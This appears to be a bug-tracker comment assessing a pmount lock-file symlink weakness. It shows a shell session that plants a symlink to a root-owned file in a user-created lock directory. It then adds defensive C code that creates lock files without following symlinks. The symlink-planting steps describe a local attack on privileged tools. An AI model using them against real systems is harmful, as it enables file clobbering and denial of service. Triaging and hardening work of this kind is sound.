Dan, I can confirm this, but I don't see that pmount is altering the contents of the file if it already exists. Eg:
$ cat /etc/foo
test
$ stat /etc/foo
File: `/etc/foo'
Size: 5 Blocks: 8 IO Block: 4096 regular file
Device: fb01h/64257d Inode: 135724 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2010-06-05 12:07:30.580581903 +0000
Modify: 2010-06-05 12:05:57.868006989 +0000
Change: 2010-06-05 12:05:57.868006989 +0000
$ mkdir /var/lock/pmount_dev_sr0
$ ls -ld /var/lock/pmount_dev_sr0/
drwxr-xr-x 2 jamie jamie 40 2010-06-05 12:12 /var/lock/pmount_dev_sr0/
$ ln -s /etc/foo /var/lock/pmount_dev_sr0/1
$ ls -l /var/lock/pmount_dev_sr0/1
lrwxrwxrwx 1 jamie jamie 8 2010-06-05 12:13 /var/lock/pmount_dev_sr0/1 -> /etc/foo
$ pmount --lock /dev/sr0 1
$ cat /etc/foo
test
$ stat /etc/foo
File: `/etc/foo'
Size: 5 Blocks: 8 IO Block: 4096 regular file
Device: fb01h/64257d Inode: 135724 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2010-06-05 12:07:30.580581903 +0000
Modify: 2010-06-05 12:05:57.868006989 +0000
Change: 2010-06-05 12:05:57.868006989 +0000
I think I would characterize this as a 'Low' issue. A local attacker in the 'plugdev' group on Ubuntu could create things like /forcefsck or maybe fiddle with files in /var to DoS applications (eg, sockets, named pipes, etc).
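Added example (not part of the comment above and not pmount's code): one way a privileged helper can create a lock file so that a symlink planted in a user-owned lock directory is refused instead of followed. The names create_lock_nofollow and demo_symlink_refused are hypothetical, and the demo uses a constructed temporary directory in place of the per-device lock directory under /var/lock.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper. `owner` is the only uid allowed to own `lockdir`
 * (0 for a setuid-root tool). Returns an open fd, or -1 with errno set. */
int create_lock_nofollow(const char *lockdir, const char *name, uid_t owner)
{
    struct stat st;
    if (strchr(name, '/')) { errno = EINVAL; return -1; }
    /* O_NOFOLLOW: refuse a lock directory that is itself a symlink. */
    int dfd = open(lockdir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0) return -1;
    /* fstat() the handle we hold, so check and use hit the same inode. */
    if (fstat(dfd, &st) < 0 || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(dfd); errno = EPERM; return -1;
    }
    /* O_CREAT|O_EXCL fails on any existing entry, including a symlink. */
    int fd = openat(dfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    int saved = errno;
    close(dfd);
    errno = saved;
    return fd;
}

/* Constructed scenario: lock name "1" is a symlink to a file that does not
 * exist yet. Returns 1 if "1" was refused and the unused name "2" worked. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/lockdemoXXXXXX", target[64], lnk[64], other[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(lnk, sizeof lnk, "%s/1", dir);
    snprintf(other, sizeof other, "%s/2", dir);
    if (symlink(target, lnk) < 0) return -1;
    int fd = create_lock_nofollow(dir, "1", geteuid());
    int refused = (fd < 0 && access(target, F_OK) != 0);
    int ok = create_lock_nofollow(dir, "2", geteuid());
    if (ok >= 0) close(ok);
    unlink(lnk); unlink(other); rmdir(dir);
    return refused && ok >= 0;
}
int main(void) { return demo_symlink_refused() == 1 ? 0 : 1; }
```

With owner set to 0, a lock directory owned by an unprivileged user, as in the session above, is rejected at the ownership check before any file is created.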